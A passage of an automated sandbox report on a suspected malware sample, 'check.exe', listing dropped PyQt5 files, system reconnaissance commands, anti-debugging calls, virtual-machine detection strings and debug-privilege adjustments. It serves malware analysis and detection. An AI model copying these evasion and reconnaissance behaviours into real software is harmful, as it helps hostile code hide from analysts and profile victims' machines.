Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Qml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwebgl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwindows.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\imageformats\qgif.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwebp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qminimal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5QmlModels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5DBus.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_wmi.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-17331

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	API coverage: 4.0 %
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	API coverage: 0.3 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6876

Thread sleep time: -14757395258967632s >= -30000s

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8E83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00007FF61E8E83C0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8E9280 FindFirstFileExW,FindClose,	4_2_00007FF61E8E9280
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E901874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00007FF61E901874

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

16_2_00007FFB9DD62E70

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 16_2_00007FFB9DD618C0 PyModule_Create2,getenv,RtlGetVersion,GetSystemInfo,InitializeCriticalSection,PyModule_GetState,PyErr_NewException,_Py_Dealloc,PyErr_NewException,PyModule_AddObject,PyErr_NewException,PyModule_AddObject,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,

16_2_00007FFB9DD618C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: check.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: QfQEMU
Source: check.exe, 00000005.00000003.1846683687.000001DB07D58000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1846083452.000001DB0795B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844275847.000001DB07D58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1846223251.000001DB07ABA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: check.exe, 00000005.00000002.2161247712.00007FFBA0308000.00000008.00000001.01000000.00000024.sdmp	Binary or memory string: .?AVQEmulationPaintEngine@@

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 4_2_00007FF61E8ED12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00007FF61E8ED12C

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 4_2_00007FF61E903480 GetProcessHeap,

4_2_00007FF61E903480

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8ED12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF61E8ED12C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8EC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF61E8EC8A0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8FA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF61E8FA614
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8ED30C SetUnhandledExceptionFilter,	4_2_00007FF61E8ED30C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD6A9E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FFB9DD6A9E8
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD6A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FFB9DD6A0C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 4_2_00007FF61E909570 cpuid

4_2_00007FF61E909570

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
